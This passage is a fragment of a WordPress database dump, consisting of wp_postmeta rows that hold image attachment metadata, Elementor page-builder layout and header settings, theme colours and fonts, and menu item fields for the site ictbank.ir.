(3132,603,'_thumbnail_id','696'),
(3133,697,'_wp_attached_file','2021/06/mysql.jpg'),
(3134,697,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1140;s:6:\"height\";i:760;s:4:\"file\";s:17:\"2021/06/mysql.jpg\";s:8:\"filesize\";i:54638;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"mysql-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10423;}s:5:\"large\";a:5:{s:4:\"file\";s:18:\"mysql-1024x760.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:760;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:52473;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"mysql-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4155;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:17:\"mysql-768x760.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:760;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38100;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3135,697,'_wp_attachment_image_alt','mysql'),
(3137,583,'_thumbnail_id','697'),
(3153,700,'_elementor_source','post'),
(3154,700,'_elementor_edit_mode','builder'),
(3155,700,'_elementor_template_type','landing-page'),
(3156,701,'_elementor_source','post'),
(3157,701,'_elementor_edit_mode','builder'),
(3158,701,'_elementor_template_type','landing-page'),
(3159,700,'_wp_page_template','elementor_canvas'),
(3160,700,'_elementor_version','3.12.1'),
(3161,700,'_elementor_pro_version','3.12.3'),
(3162,702,'_elementor_source','post'),
(3163,702,'_elementor_edit_mode','builder'),
(3164,702,'_elementor_template_type','landing-page'),
(3165,702,'_wp_page_template','elementor_canvas'),
(3166,702,'_elementor_version','3.12.1'),
(3167,702,'_elementor_pro_version','3.12.3'),
(3168,700,'_edit_lock','1682960705:2'),
(3169,700,'_elementor_data','[{\"id\":\"d33770f\",\"elType\":\"container\",\"settings\":[],\"elements\":[{\"id\":\"95560ec\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"cards\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"cards_meta_data\":[\"date\"],\"cards_card_border_radius\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}]'),
(3171,703,'_elementor_source','post'),
(3172,703,'_elementor_edit_mode','builder'),
(3173,703,'_elementor_template_type','landing-page'),
(3174,703,'_wp_page_template','elementor_canvas'),
(3175,703,'_elementor_version','3.12.1'),
(3176,703,'_elementor_pro_version','3.12.3'),
(3177,703,'_elementor_data','[{\"id\":\"d33770f\",\"elType\":\"container\",\"settings\":[],\"elements\":[{\"id\":\"95560ec\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"cards\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}]'),
(3179,704,'_elementor_source','post'),
(3180,704,'_elementor_edit_mode','builder'),
(3181,704,'_elementor_template_type','landing-page'),
(3182,704,'_wp_page_template','elementor_canvas'),
(3183,704,'_elementor_version','3.12.1'),
(3184,704,'_elementor_pro_version','3.12.3'),
(3185,704,'_elementor_data','[{\"id\":\"d33770f\",\"elType\":\"container\",\"settings\":[],\"elements\":[{\"id\":\"95560ec\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"cards\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}]'),
(3187,705,'_elementor_source','post'),
(3188,705,'_elementor_edit_mode','builder'),
(3189,705,'_elementor_template_type','landing-page'),
(3190,705,'_wp_page_template','elementor_canvas'),
(3191,705,'_elementor_version','3.12.1'),
(3192,705,'_elementor_pro_version','3.12.3'),
(3193,705,'_elementor_data','[{\"id\":\"d33770f\",\"elType\":\"container\",\"settings\":[],\"elements\":[{\"id\":\"95560ec\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"cards\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}]'),
(3195,706,'_elementor_source','post'),
(3196,706,'_elementor_edit_mode','builder'),
(3197,706,'_elementor_template_type','landing-page'),
(3198,706,'_wp_page_template','elementor_canvas'),
(3199,706,'_elementor_version','3.12.1'),
(3200,706,'_elementor_pro_version','3.12.3'),
(3201,706,'_elementor_data','[{\"id\":\"d33770f\",\"elType\":\"container\",\"settings\":[],\"elements\":[{\"id\":\"95560ec\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"cards\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}]'),
(3203,707,'_elementor_source','post'),
(3204,707,'_elementor_edit_mode','builder'),
(3205,707,'_elementor_template_type','landing-page'),
(3206,707,'_wp_page_template','elementor_canvas'),
(3207,707,'_elementor_version','3.12.1'),
(3208,707,'_elementor_pro_version','3.12.3'),
(3209,707,'_elementor_data','[{\"id\":\"d33770f\",\"elType\":\"container\",\"settings\":[],\"elements\":[{\"id\":\"95560ec\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"cards\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}]'),
(3211,708,'_elementor_source','post'),
(3212,708,'_elementor_edit_mode','builder'),
(3213,708,'_elementor_template_type','landing-page'),
(3214,708,'_wp_page_template','elementor_canvas'),
(3215,708,'_elementor_version','3.12.1'),
(3216,708,'_elementor_pro_version','3.12.3'),
(3217,708,'_elementor_data','[{\"id\":\"d33770f\",\"elType\":\"container\",\"settings\":[],\"elements\":[{\"id\":\"95560ec\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"cards\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"cards_card_border_radius\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}]'),
(3219,709,'_elementor_source','post'),
(3220,709,'_elementor_edit_mode','builder'),
(3221,709,'_elementor_template_type','landing-page'),
(3222,709,'_wp_page_template','elementor_canvas'),
(3223,709,'_elementor_version','3.12.1'),
(3224,709,'_elementor_pro_version','3.12.3'),
(3225,709,'_elementor_data','[{\"id\":\"d33770f\",\"elType\":\"container\",\"settings\":[],\"elements\":[{\"id\":\"95560ec\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"cards\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"cards_card_border_radius\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}]'),
(3227,710,'_elementor_source','post'),
(3228,710,'_elementor_edit_mode','builder'),
(3229,710,'_elementor_template_type','landing-page'),
(3230,710,'_wp_page_template','elementor_canvas'),
(3231,710,'_elementor_version','3.12.1'),
(3232,710,'_elementor_pro_version','3.12.3'),
(3233,710,'_elementor_data','[{\"id\":\"d33770f\",\"elType\":\"container\",\"settings\":[],\"elements\":[{\"id\":\"95560ec\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"cards\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"cards_card_border_radius\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}]'),
(3235,711,'_elementor_source','post'),
(3236,711,'_elementor_edit_mode','builder'),
(3237,711,'_elementor_template_type','landing-page'),
(3238,711,'_wp_page_template','elementor_canvas'),
(3239,711,'_elementor_version','3.12.1'),
(3240,711,'_elementor_pro_version','3.12.3'),
(3241,711,'_elementor_data','[{\"id\":\"d33770f\",\"elType\":\"container\",\"settings\":[],\"elements\":[{\"id\":\"95560ec\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"cards\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"cards_meta_data\":[\"date\"],\"cards_card_border_radius\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}]'),
(3247,712,'_elementor_edit_mode','builder'),
(3248,712,'_elementor_template_type','page'),
(3249,712,'_elementor_version','3.13.1'),
(3250,712,'_elementor_pro_version','3.12.3'),
(3251,713,'_elementor_edit_mode','builder'),
(3252,713,'_elementor_template_type','page'),
(3253,713,'_elementor_version','3.12.2'),
(3254,713,'_elementor_pro_version','3.12.3'),
(3255,712,'_wp_page_template','elementor_canvas'),
(3256,712,'_elementor_data','[{\"id\":\"735a55e8\",\"elType\":\"container\",\"settings\":[],\"elements\":[{\"id\":\"399ff891\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"cards\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"cards_meta_data\":[\"date\"],\"cards_card_border_radius\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"posts_include\":[\"terms\"],\"posts_include_term_ids\":[\"8\"],\"pagination_type\":\"numbers_and_prev_next\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}]'),
(3257,714,'_elementor_edit_mode','builder'),
(3258,714,'_elementor_template_type','page'),
(3259,714,'_elementor_version','3.12.2'),
(3260,714,'_elementor_pro_version','3.12.3'),
(3261,714,'_wp_page_template','elementor_canvas'),
(3262,714,'_elementor_data','[{\"id\":\"735a55e8\",\"elType\":\"container\",\"settings\":[],\"elements\":[{\"id\":\"399ff891\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"cards\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"cards_meta_data\":[\"date\"],\"cards_card_border_radius\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}]'),
(3265,358,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),
(3266,681,'_elementor_screenshot_failed','2023-05-01 16:49:48'),
(3269,715,'_elementor_source','post'),
(3270,715,'_elementor_edit_mode','builder'),
(3271,715,'_elementor_template_type','header'),
(3272,715,'_elementor_version','3.20.4'),
(3273,715,'_elementor_pro_version','3.13.2'),
(3274,715,'_edit_lock','1758398186:1'),
(3275,715,'_wp_page_template','default'),
(3276,715,'_elementor_data','[{\"id\":\"26f7bc3\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true},\"flex_justify_content\":\"space-around\"},\"elements\":[{\"id\":\"6a3646c\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column-reverse\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":77.085},\"_flex_size\":\"none\",\"_element_width\":\"initial\"},\"elements\":[{\"id\":\"af2cd87\",\"elType\":\"widget\",\"settings\":{\"menu\":\"main-menu\",\"__globals__\":{\"color_menu_item\":\"globals\\/colors?id=text\",\"color_menu_item_hover\":\"globals\\/colors?id=accent\",\"pointer_color_menu_item_hover\":\"globals\\/colors?id=secondary\",\"color_menu_item_active\":\"globals\\/colors?id=accent\"},\"align_items\":\"center\",\"full_width\":\"stretch\",\"text_align\":\"center\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]},\"menu_typography_font_size_tablet\":{\"unit\":\"custom\",\"size\":\"\",\"sizes\":[]},\"menu_typography_font_size_mobile\":{\"unit\":\"custom\",\"size\":\"\",\"sizes\":[]},\"menu_typography_font_weight\":\"900\",\"pointer_width\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"menu_space_between\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true},{\"id\":\"293e0f3\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":20}},\"elements\":[{\"id\":\"8ab8263\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":true}],\"isInner\":false}]'),
(3278,716,'_elementor_edit_mode','builder'),
(3279,716,'_elementor_template_type','kit'),
(3280,716,'_elementor_version','3.12.1'),
(3281,716,'_wp_page_template','default'),
(3282,716,'_elementor_page_settings','a:14:{s:13:\"system_colors\";a:4:{i:0;a:3:{s:3:\"_id\";s:7:\"primary\";s:5:\"title\";s:7:\"Primary\";s:5:\"color\";s:7:\"#4EFF00\";}i:1;a:3:{s:3:\"_id\";s:9:\"secondary\";s:5:\"title\";s:9:\"Secondary\";s:5:\"color\";s:7:\"#0074FF\";}i:2;a:3:{s:3:\"_id\";s:4:\"text\";s:5:\"title\";s:4:\"Text\";s:5:\"color\";s:7:\"#FFFFFF\";}i:3;a:3:{s:3:\"_id\";s:6:\"accent\";s:5:\"title\";s:6:\"Accent\";s:5:\"color\";s:7:\"#61CE70\";}}s:13:\"custom_colors\";a:0:{}s:17:\"system_typography\";a:4:{i:0;a:5:{s:3:\"_id\";s:7:\"primary\";s:5:\"title\";s:7:\"Primary\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Roboto\";s:22:\"typography_font_weight\";s:3:\"600\";}i:1;a:5:{s:3:\"_id\";s:9:\"secondary\";s:5:\"title\";s:9:\"Secondary\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:11:\"Roboto Slab\";s:22:\"typography_font_weight\";s:3:\"400\";}i:2;a:5:{s:3:\"_id\";s:4:\"text\";s:5:\"title\";s:4:\"Text\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Roboto\";s:22:\"typography_font_weight\";s:3:\"400\";}i:3;a:5:{s:3:\"_id\";s:6:\"accent\";s:5:\"title\";s:6:\"Accent\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Roboto\";s:22:\"typography_font_weight\";s:3:\"500\";}}s:17:\"custom_typography\";a:0:{}s:21:\"default_generic_fonts\";s:10:\"Sans-serif\";s:9:\"site_name\";s:10:\"ictbank.ir\";s:26:\"body_background_background\";s:7:\"classic\";s:21:\"body_background_color\";s:7:\"#000000\";s:25:\"mobile_browser_background\";s:7:\"#FF0000\";s:19:\"page_title_selector\";s:14:\"h1.entry-title\";s:11:\"viewport_md\";i:768;s:11:\"viewport_lg\";i:1025;s:27:\"hello_footer_copyright_text\";s:19:\"All rights reserved\";s:15:\"activeItemIndex\";i:1;}'),
(3283,716,'_elementor_data','[]'),
(3285,716,'_elementor_pro_version','3.11.7'),
(3290,717,'_elementor_source','post'),
(3291,717,'_elementor_edit_mode','builder'),
(3292,717,'_elementor_template_type','header'),
(3293,717,'_elementor_version','3.12.2'),
(3294,717,'_elementor_pro_version','3.12.3'),
(3295,717,'_wp_page_template','default'),
(3296,717,'_elementor_data','[{\"id\":\"3388447\",\"elType\":\"container\",\"settings\":[],\"elements\":[{\"id\":\"8ab8263\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}]'),
(3298,718,'_elementor_source','post'),
(3299,718,'_elementor_edit_mode','builder'),
(3300,718,'_elementor_template_type','header'),
(3301,718,'_elementor_version','3.12.2'),
(3302,718,'_elementor_pro_version','3.12.3'),
(3303,718,'_wp_page_template','default'),
(3304,718,'_elementor_data','[{\"id\":\"26f7bc3\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"293e0f3\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"33.3333\"}},\"elements\":[{\"id\":\"8ab8263\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":true},{\"id\":\"6a3646c\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"66.6666\"}},\"elements\":[{\"id\":\"af2cd87\",\"elType\":\"widget\",\"settings\":{\"menu\":\"main-menu\",\"__globals__\":{\"color_menu_item\":\"globals\\/colors?id=primary\",\"color_menu_item_hover\":\"globals\\/colors?id=accent\",\"pointer_color_menu_item_hover\":\"globals\\/colors?id=secondary\"}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true}],\"isInner\":false},{\"id\":\"3388447\",\"elType\":\"container\",\"settings\":[],\"elements\":[],\"isInner\":false}]'),
(3306,715,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),
(3307,719,'_elementor_source','post'),
(3308,719,'_elementor_edit_mode','builder'),
(3309,719,'_elementor_template_type','header'),
(3310,719,'_elementor_version','3.12.2'),
(3311,719,'_elementor_pro_version','3.12.3'),
(3312,719,'_wp_page_template','default'),
(3313,719,'_elementor_data','[{\"id\":\"26f7bc3\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"293e0f3\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":20}},\"elements\":[{\"id\":\"8ab8263\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":true},{\"id\":\"6a3646c\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":80}},\"elements\":[{\"id\":\"af2cd87\",\"elType\":\"widget\",\"settings\":{\"menu\":\"main-menu\",\"__globals__\":{\"color_menu_item\":\"globals\\/colors?id=primary\",\"color_menu_item_hover\":\"globals\\/colors?id=accent\",\"pointer_color_menu_item_hover\":\"globals\\/colors?id=secondary\"}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true}],\"isInner\":false},{\"id\":\"3388447\",\"elType\":\"container\",\"settings\":[],\"elements\":[],\"isInner\":false}]'),
(3315,719,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),
(3318,720,'_elementor_source','post'),
(3319,720,'_elementor_edit_mode','builder'),
(3320,720,'_elementor_template_type','header'),
(3321,720,'_elementor_version','3.12.2'),
(3322,720,'_elementor_pro_version','3.12.3'),
(3323,720,'_wp_page_template','default'),
(3324,720,'_elementor_data','[{\"id\":\"26f7bc3\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"293e0f3\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":20}},\"elements\":[{\"id\":\"8ab8263\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":true},{\"id\":\"6a3646c\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column-reverse\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":80}},\"elements\":[{\"id\":\"af2cd87\",\"elType\":\"widget\",\"settings\":{\"menu\":\"main-menu\",\"__globals__\":{\"color_menu_item\":\"globals\\/colors?id=primary\",\"color_menu_item_hover\":\"globals\\/colors?id=accent\",\"pointer_color_menu_item_hover\":\"globals\\/colors?id=secondary\"}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true}],\"isInner\":false},{\"id\":\"3388447\",\"elType\":\"container\",\"settings\":[],\"elements\":[],\"isInner\":false}]'),
(3326,720,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),
(3333,721,'_menu_item_type','post_type'),
(3334,721,'_menu_item_menu_item_parent','0'),
(3335,721,'_menu_item_object_id','647'),
(3336,721,'_menu_item_object','page'),
(3337,721,'_menu_item_target',''),
(3338,721,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(3339,721,'_menu_item_xfn',''),
(3340,721,'_menu_item_url',''),
(3342,401,'_wp_old_date','2021-06-26'),
(3343,550,'_wp_old_date','2021-06-26'),
(3344,547,'_wp_old_date','2021-06-26'),
(3345,548,'_wp_old_date','2021-06-26'),
(3346,549,'_wp_old_date','2021-06-26'),
(3356,723,'_elementor_edit_mode','builder'),
(3357,723,'_elementor_template_type','wp-page'),
(3358,723,'_elementor_version','3.8.1'),
(3359,723,'_elementor_pro_version','3.5.1'),
(3360,723,'_wp_page_template','default'),
(3361,723,'_elementor_data','[{\"id\":\"0b85431\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4caea37\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b1b1580\",\"elType\":\"widget\",\"settings\":{\"classic_columns\":\"1\",\"classic_thumbnail\":\"none\",\"classic_show_excerpt\":\"\",\"classic_meta_data\":[],\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_show_read_more\":\"\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"posts_include\":[\"terms\"],\"posts_include_term_ids\":[\"8\"],\"classic_row_gap\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"classic_alignment\":\"left\",\"classic_title_color\":\"#FFFFFF\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false}]'),
(3363,724,'_elementor_edit_mode','builder'),
(3364,724,'_elementor_template_type','wp-page'),
(3365,724,'_elementor_version','3.8.1'),
(3366,724,'_elementor_pro_version','3.5.1'),
(3367,724,'_wp_page_template','default'),
(3368,724,'_elementor_data','[{\"id\":\"0b85431\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4caea37\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b1b1580\",\"elType\":\"widget\",\"settings\":{\"classic_columns\":\"1\",\"classic_thumbnail\":\"none\",\"classic_show_excerpt\":\"\",\"classic_meta_data\":[],\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_show_read_more\":\"\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"posts_include\":[\"terms\"],\"posts_include_term_ids\":[\"8\"],\"classic_row_gap\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"classic_alignment\":\"left\",\"classic_title_color\":\"#FFFFFF\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false}]'),
(3370,630,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(3371,725,'_elementor_edit_mode','builder'),
(3372,725,'_elementor_template_type','wp-page'),
(3373,725,'_elementor_version','3.8.1'),
(3374,725,'_elementor_pro_version','3.5.1'),
(3375,725,'_wp_page_template','default'),
